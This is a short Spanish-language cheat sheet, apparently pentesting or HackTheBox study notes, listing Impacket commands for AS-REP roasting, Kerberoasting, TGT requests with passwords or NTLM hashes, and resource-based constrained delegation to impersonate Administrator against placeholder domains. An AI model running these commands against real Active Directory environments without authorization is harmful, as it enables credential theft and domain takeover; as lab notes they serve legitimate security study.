Impacket

AS-REP Roast (GetNPUsers)

# AS-REP Roasting a través de un listado de usuarios en 'users.txt'
impacket-GetNPUsers -no-pass -usersfile users.txt dominio.htb/ 2>/dev/null

# AS-REP Roasting para un usuario en concreto
impacket-GetNPUsers dominio.htb/usuer -no-pass 2>/dev/null

Kerberoasting Attack (GetUserSPNs)

# Kerberoasting Attack con credenciales válidas y autenticación NTLM
impacket-GetUserSPNs -dc-ip 10.10.10.10 dominio.htb/user -request 2>/dev/null
impacket-GetUserSPNs -dc-ip 10.10.10.10 dominio.htb/user:'password' -request 2>/dev/null

# Kerberoasting Attack a través de autenticación Kerberos
impacket-GetUserSPNs -dc-ip 10.10.10.10 -dc-host dc.dominio.htb dominio.htb/user -k -no-pass -request 2>/dev/null

# Kerberoasting sin credenciales de dominio pero con un usuario AS-REP Roast, necesario disponer de lista de usuarios en 'users.txt'
impacket-GetUserSPNs -no-preauth 'usuario-asrep' -request -usersfile users.txt dominio.htb/ -dc-ip 10.10.10.161 2>/dev/null

Obtaining Ticket Granting Ticket [TGT] (getTGT)

# Obtención de TGT a través de contraseña básica
impacket-getTGT dominio.htb/user:'password' -dc-ip 10.10.10.10

# Obtención de TGT a través de Hash NTLM
impacket-getTGT dominio.htb/user -hashes :<NTLM_HASH> -dc-ip 10.10.10.10

# Obtención de TGT a través de Autenticación Kerberos
impacket-getTGT dominio.htb/user -k -no-pass -dc-ip 10.10.10.10

Resource Based Constrained Delegation [RBCD] (getST)

# RBCD a través de autenticación NTLM
impacket-getST -spn 'cifs/DC.dominio.htb' -impersonate Administrator -dc-ip 10.10.10.10 'dominio.htb'/'target_rbcd':'password' 2>/dev/null

# RBCD a través de PassTheHash
impacket-getST -spn 'cifs/DC.dominio.htb' -impersonate Administrator -dc-ip 10.10.10.10 'dominio.htb'/'target_rbcd' -hashes :<NTLM_HASH> 2>/dev/null

# RBCD a través de Autenticación Kerberos
impacket-getST -spn 'cifs/DC.dominio.htb' -impersonate Administrator -dc-ip 10.10.10.10 'dominio.htb'/'target_rbcd' -k -no-pass 2>/dev/null

Última actualización

¿Te fue útil?